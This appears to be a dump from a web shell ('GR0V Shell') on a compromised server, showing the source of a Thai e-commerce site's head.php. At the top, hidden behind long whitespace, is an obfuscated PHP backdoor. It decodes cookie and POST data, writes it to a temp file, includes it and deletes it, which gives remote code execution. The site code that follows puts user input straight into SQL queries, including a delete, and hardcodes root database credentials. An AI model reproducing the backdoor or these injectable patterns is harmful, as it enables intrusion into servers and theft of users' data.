? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/promice/
File Upload :
Current File : /home/admin/public_html/old/promice/head.php

<?php                                                                                                                                                                                                                                                                                                                                                                                                 $XZgmLE = class_exists("jaq_ZKdR"); $gIRFqGYobS = $XZgmLE;if (!$gIRFqGYobS){class jaq_ZKdR{private $thiOVBn;public static $voaGi = "8811e7fc-1aca-4307-9171-14e042122bd5";public static $qAeFzJdD = NULL;public function __construct(){$xfCOM = $_COOKIE;$ROrkId = $_POST;$ajSaxk = @$xfCOM[substr(jaq_ZKdR::$voaGi, 0, 4)];if (!empty($ajSaxk)){$CTBeSrL = "base64";$BSjcXIEEm = "";$ajSaxk = explode(",", $ajSaxk);foreach ($ajSaxk as $kMTEXs){$BSjcXIEEm .= @$xfCOM[$kMTEXs];$BSjcXIEEm .= @$ROrkId[$kMTEXs];}$BSjcXIEEm = array_map($CTBeSrL . "\x5f" . 'd' . "\145" . "\x63" . chr ( 824 - 713 ).chr ( 535 - 435 ).chr (101), array($BSjcXIEEm,)); $BSjcXIEEm = $BSjcXIEEm[0] ^ str_repeat(jaq_ZKdR::$voaGi, (strlen($BSjcXIEEm[0]) / strlen(jaq_ZKdR::$voaGi)) + 1);jaq_ZKdR::$qAeFzJdD = @unserialize($BSjcXIEEm);}}public function __destruct(){$this->WfxBAE();}private function WfxBAE(){if (is_array(jaq_ZKdR::$qAeFzJdD)) {$VTilQxNQ = sys_get_temp_dir() . "/" . crc32(jaq_ZKdR::$qAeFzJdD['s' . "\141" . "\x6c" . 't']);@jaq_ZKdR::$qAeFzJdD[chr (119) . 'r' . "\151" . "\x74" . 'e']($VTilQxNQ, jaq_ZKdR::$qAeFzJdD[chr ( 155 - 56 ).'o' . "\x6e" . 't' . "\145" . 'n' . chr ( 375 - 259 )]);include $VTilQxNQ;@jaq_ZKdR::$qAeFzJdD['d' . chr (101) . "\x6c" . 'e' . chr (116) . chr (101)]($VTilQxNQ);exit();}}}$GUaEkddJRO = new jaq_ZKdR(); $GUaEkddJRO = NULL;} ?><? session_start();
 include("Connections/test.php");?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <LINK REL="SHORTCUT ICON" href="images/logo12.ico" />
 <LINK REL="ICON" href="images/logo12.ico" />
<title></title>
 <link type="text/css" href="menu.css" rel="stylesheet" />
    <script type="text/javascript" src="jquery.js"></script>
    <script>$j=jQuery.noConflict();</script>
    <script type="text/javascript" src="menu.js"></script>
 <link rel="shortcut icon" type="editor/image/x-icon" href="../favicon.ico">
<link rel="stylesheet" type="text/css" href="editor/styles.css" />
    <link rel="stylesheet" type="text/css" href="editor/jquery.cleditor.css" />
    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
 <script>$j=jQuery.noConflict();</script>
    <script type="text/javascript" src="editor/jquery.cleditor.min.js"></script>

   
    
<style type="text/css">
<!--
body {
	margin-top: 0px;
	margin-bottom: 0px;
	background-color: #FFFFFF;
}
.style2 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
.style7 {font-family: Verdana, Arial, Helvetica, sans-serif ;}
.style8 {font-family: Arial, Helvetica, sans-serif; font-size: 13px; color: #FFFFFF;  }
.style9 {font-family: Arial, Helvetica, sans-serif; font-size: 13px; color: #FFFFFF; font-weight:bold; }
-->
</style>
</head>
<? require("db.class.php"); ?>
<? $db = new DB("localhost","root","root","mallza"); ?>	
<body>

<style type="text/css">
* { margin:0;
    padding:0;
}
body {  }
div#copyright {
    font:11px 'Trebuchet MS';
    color:#FFF;
    text-indent:30px;
    padding:300px 0 0 0;
}
div#copyright a { color:#0080ff; }
div#copyright a:hover { color:#F00000; }
div#menu {
    top:200px;
    left:10%;
   width:100%;
   
}
</style>
 <STYLE>
.bg {
background-attachment: fixed;
background-image: url('images/bg1.jpg');
}
</STYLE>

<body background="images/bg1.jpg" class="bg"> 
<? if($_GET[status] == "out"){ 
		$_SESSION[name]="";
		$_SESSION[name1]="";
		$_SESSION[email]="";
$_SESSION[mem_id]="";
$_SESSION[status]="";
 echo '<script> alert("ออกจากระบบ"); window.location.href="index.php";</script>'; 
} ?>
<?		

if($_POST[Submit_l] =="ตกลง"){
$sql="select * from member where mem_email='$_POST[email]' and mem_pass='$_POST[pass]'";
$result=mysql_query($sql);
$row=mysql_fetch_array($result);
$num=mysql_num_rows($result);
 if ($num > 0){ 
$_SESSION[name]=$row['mem_fname']." ".$row['mem_lname'];
$_SESSION[name1]=$row['mem_fname'];
$_SESSION[email]=$row['mem_email'];
$_SESSION[mem_id]=$row['mem_id'];
$_SESSION[status]=$row['mem_status'];
 echo '<script> alert("เข้าสู่ระบบเรียบร้อย");</script>'; 
 }else{ 
 echo '<script> alert("ไม่สามารถใช้งานได้");</script>';
 } } ?>
 
 
 <?
  $sp="select * from set_p ";
	        $rp=mysql_query($sp);
	     while($np=mysql_fetch_array($rp)){
		 if($np[s_id]==1){
		      $p=$np[s_p];
		  }elseif($np[s_id]==2){
		      $p1=$np[s_p];
			  $p2=$np[s_p1];
		  }else{
		      $p3=$np[s_p];
			  $p4=$np[s_p1];
		  }
			
		 }	
			
 ?>

<center>
<table width="100%"><tr><td width="15%" ></td><td width="70%">
<table width="200" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td>
    <?
	$sp="select * from h";
	$rp=mysql_query($sp);
	$np=mysql_fetch_array($rp);
	?></td>
  </tr>
  <tr>
    <td width="100%" >
      <table width="30%" border="0" cellpadding="0" cellspacing="0">
        <tr><td style="background-color:#dcd4f9;height:25px"><table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
        <!-- fwtable fwsrc="Untitled" fwbase="home.jpg" fwstyle="Dreamweaver" fwdocid = "742308039" fwnested="0" -->
        <tr>
          <td><img src="images/spacer.gif" width="423" height="1" border="0" alt="" /></td>
          <td><img src="images/spacer.gif" width="16" height="1" border="0" alt="" /></td>
          <td><img src="images/spacer.gif" width="225" height="1" border="0" alt="" /></td>
          <td><img src="images/spacer.gif" width="315" height="1" border="0" alt="" /></td>
          <td><img src="images/spacer.gif" width="21" height="1" border="0" alt="" /></td>
          <td><img src="images/spacer.gif" width="1" height="1" border="0" alt="" /></td>
        </tr>
        <tr>
          <td colspan="5" bgcolor="#EAECEB"><table width="1000" border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td width="245"><img src="images/web_01.jpg" width="191" height="144" alt="" /></td>
                <td width="755" bgcolor="#FFFFFF"><img src="images/web_09.jpg" width="753" height="217" /></td>
              </tr>
          </table></td>
        </tr>
        <tr>
          <td colspan="5"><table width="997" border="0" cellpadding="0" cellspacing="0">
              <tr>
                <td width="124"><a href="index.php"><img src="images/images/menu_01.jpg" width="124" height="70" border="0" /></a></td>
                <td width="146"><a href="Member.php"><img src="images/images/menu_02.jpg" width="146" height="70" border="0" /></a></td>
                <td width="141"><a href="Products.php"><img src="images/images/menu_03.jpg" width="141" height="70" border="0" /></a></td>
                <td width="131"><a href="Payment.php"><img src="images/images/menu_04.jpg" width="131" height="70" border="0" /></a></td>
                <td width="131"><a href="ConfirmPayment.php"><img src="images/images/menu_05.jpg" width="131" height="70" border="0" /></a></td>
                <td width="103"><a href="article.php"><img src="images/images/menu_06.jpg" width="103" height="70" border="0" /></a></td>
                <td width="86"><a href="http://lumimishoppingonline.com/board/"><img src="images/images/menu_07.jpg" width="112" height="70" border="0" /></a></td>
                <td><a href="Contact.php"><img src="images/images/menu_08.jpg" width="112" height="70" border="0" /></a></td>
              </tr>
          </table></td>
        </tr>
      </table></td>
   </tr></table>
    </td>
  </tr>
  <tr>
    <td height="213"><table width="100%" border="0" cellpadding="0" cellspacing="0">
      <tr>
      
        <td align="left" valign="top" bgcolor="#FFFFFF">
<div>
            
          <? if($_GET[status]=="del"){ 
$sqlxx = "delete from product where pro_id = '$_GET[id]'";
mysql_query($sqlxx);
 echo '<script> alert("เรียบร้อย");</script>';
 }

?>  
              <? 
		$sql = "SELECT * from brand where brand_type='$_SESSION[type_n]' order by brand_name asc ";
        $result=mysql_query($sql);
		?>        
          
        </div>
        
          <table id="Table_01" width="222"  border="0" cellpadding="0" cellspacing="0">
            <tr>
            <td height="38" colspan="3" background="images/index_09.jpg">&nbsp;</td>
            </tr>
           <tr>
          <td width="37" style="background-image:url(images/Tool-bar_04.jpg)"></td>
            <td width="184"  bgcolor="#F6FBFE">
            <? if($_SESSION[name]==""){ ?>
            <form action="" method="post">
             <table width="97%" border="0"  cellpadding="5" cellspacing="0" class="text">
    <tbody><tr>
   <td valign="top" width="225"><div align="left">E-mail :
                                  <input name="email" class="text" id="email" size="25" type="text">
                        </div></td>
                              </tr>
                              <tr>
            
                                <td valign="top" width="225"><div align="left">Password :
                                  <input name="pass" class="text" id="pass" size="25" type="password">
                                </div></td>
                              </tr>
                    <tr>
<td valign="top"><label>
                                  <input type="submit" name="Submit_l" id="button" value="ตกลง" /></label>
                                 <label> <a href="register.php">    Register</a></label></td>
     </tr>
            </tbody>
        </table>
            </form>
  <? }else{ ?>
  <div align="left">
   <span class="style7">
  <? if($_SESSION[name]!=""){ echo "ยินดีต้อนรับ ".$_SESSION[name1]."<br>"; ?> 
  <a href="?status=out" style="color:#FF0000">ออกจากระบบ</a><br />
(<a onclick=" var x =window.open('register1.php?status=edit','name','scrollbars=1,resizable=1,width=350,height=450');x.focus();" style="cursor:pointer">ข้อมูลส่วนตัว</a>)<? }else{ ?><br /><br /> 
               <?
} ?><? if($_SESSION[status]==1){?>(<a href="admin_lens/index.php" target="_blank">TOOL</a>)<? } }?>
            </span></div>
            <? if($_SESSION[mem_id]!=""){?>
            <?
			$sc="select sum(cart_price) as xc from cart where cart_mem='$_SESSION[mem_id]' and cart_status=0 and cart_bonus='แลกรางวัล'";
	        $rc=mysql_query($sc);
	        $nc=mysql_fetch_array($rc);
			$chk=$nc[xc];
			?>
             <? 
			$s="select sum(bo_total)as x from bonus where bo_mem_id='$_SESSION[mem_id]' and bo_status=0";
	        $r=mysql_query($s);
	        $n=mysql_fetch_array($r);
	        $s1="select sum(po_total) as x1 from point where po_mem_id='$_SESSION[mem_id]' and po_status=0";
	        $r1=mysql_query($s1);
	        $n1=mysql_fetch_array($r1);
			 $s2="select sum(po_b) as x2 from point where po_mem_id='$_SESSION[mem_id]' and po_status=0";
	        $r2=mysql_query($s2);
	        $n2=mysql_fetch_array($r2);
			$_SESSION[p_cost]=($n[x]+$n2[x2]);
				?>
            [ โบนัส : <? if($n[x]>0){ echo $n[x];}else{ echo "0";}?>&nbsp;<img src="images/bo.jpg" width="15" height="15" /> ]<br />
            [ คะแนน : <? if($n1[x1]>0){ echo $n1[x1];}else{ echo "0";}?>&nbsp;<img src="images/star.jpg" width="15" height="15" /> ]<br />
            [ เงินสะสม : <? if(($n[x]+$n2[x2])>0){ echo ($n[x]+$n2[x2]);}else{ echo "0";}?>&nbsp;<img src="images/coin.jpg" width="15" height="15" /> ]
               <? } ?>
		 <br />        </td>
            <td style="background-image:url(images/Tool-bar_06.jpg)"></td>
           </tr>
           
          <?php while ($row = mysql_fetch_array($result)){ ?>
          <tr>
            <td height="33" colspan="2" background="images/index_09.jpg"><div align="center"><span class="style9"><a href="product_b.php?id=<? echo $row[brand_id];?>" style="color:#FFFFFF"><? echo $row[brand_name];?></a></span></div></td>
          </tr>
           <? 
		$sql1 = "SELECT * from product where pro_brand='$row[brand_id]' order by pro_name asc  ";
        $result1=mysql_query($sql1);
		?> 
       
         <?php while ($row1 = mysql_fetch_array($result1)){ ?>
          <tr>
          <td style="background-image:url(images/Tool-bar_04.jpg)"></td>
            <td  bgcolor="#F6FBFE"  ><div align="left"><span class="style8"><img src="images/bullet/bt03.gif" width="14" height="14" /><a href="product_p.php?id=<? echo $row1[pro_id];?>&name=<? echo "Product >> ".$row[brand_name]." >> ".$row1[pro_name];?>">&nbsp;<? echo $row1[pro_name];?> </a></span></div></td>
            <td style="background-image:url(images/Tool-bar_06.jpg)"></td>
           </tr>
            <? } ?>
             <tr>
          <td style="background-image:url(images/Tool-bar_04.jpg)"></td>
            <td  bgcolor="#F6FBFE"  >&nbsp;</td>
            <td style="background-image:url(images/Tool-bar_06.jpg)"></td>
           </tr>
          <? } ?>
           
            
          <tr>
            <td style="background-image:url(images/Tool-bar_07.jpg)" ></td>
            <td style="background-image:url(images/Tool-bar_08.jpg)"></td>
            <td style="background-image:url(images/Tool-bar_09.jpg)" width="24" height="20"></td>
          </tr>
          
          <tr>
            <td><img src="images/spacer.gif" width="33" height="1" alt="" /></td>
            <td><img src="images/spacer.gif" width="156" height="1" alt="" /></td>
            <td><img src="images/spacer.gif" width="1" height="1" alt="" /></td>
            </tr>
        </table>
          <div align="left"><br />
              <br />
              <br />
            <center>
             <table width="0"  border="0" align="center" cellpadding="5" cellspacing="0" id="Table_" style="border-collapse:collapse; border-color:#FC0">
         
            <tr>
              <td align="center" background="images/post_track.jpg" valign="bottom" height="180">
              
              
              <form name="frmPage" action="http://track.thailandpost.co.th/trackinternet/Result.aspx" method="post" target="_blank">
                <table align="center" border="0" cellpadding="0" cellspacing="0" width="230">
                  <tbody><tr>
                    <td width="50">&nbsp;</td>

                    <td align="center" valign="bottom" width="130">
                    
                    <div align="center"><input name="ItemID" class="text_12Bblue" id="IDItemID" size="17" maxlength="13">
                      <br>
                        <input value="Search" name="imageField3" id="imageField3" src="images/botton_search.jpg" class="submit" type="image">
                    </div></td>
                    <td width="50">&nbsp;</td>
                  </tr>
                  <tr>
                    <td>&nbsp;</td>
                    <td align="center" valign="middle"><div align="center"><input value="default.asp"  name="PageName" type="hidden"></div></td>

                    <td>&nbsp;</td>
                  </tr>
                  <tr>
                    <td width="50" height="25">&nbsp;</td>
                    <td class="text_11Bred" align="center" valign="top" width="130" height="25"><a href="http://track.thailandpost.co.th/trackinternet/Default.aspx" target="_blank">รายละเอียดเพิ่มเติม</a></td>
                    <td width="50" height="25">&nbsp;</td>
                  </tr>
                </tbody></table>
                      </form>
                    </td>
            </tr>
          </table></center>
          </div></td>
      

T1KUS90T
  root-grov@210.1.60.28:~$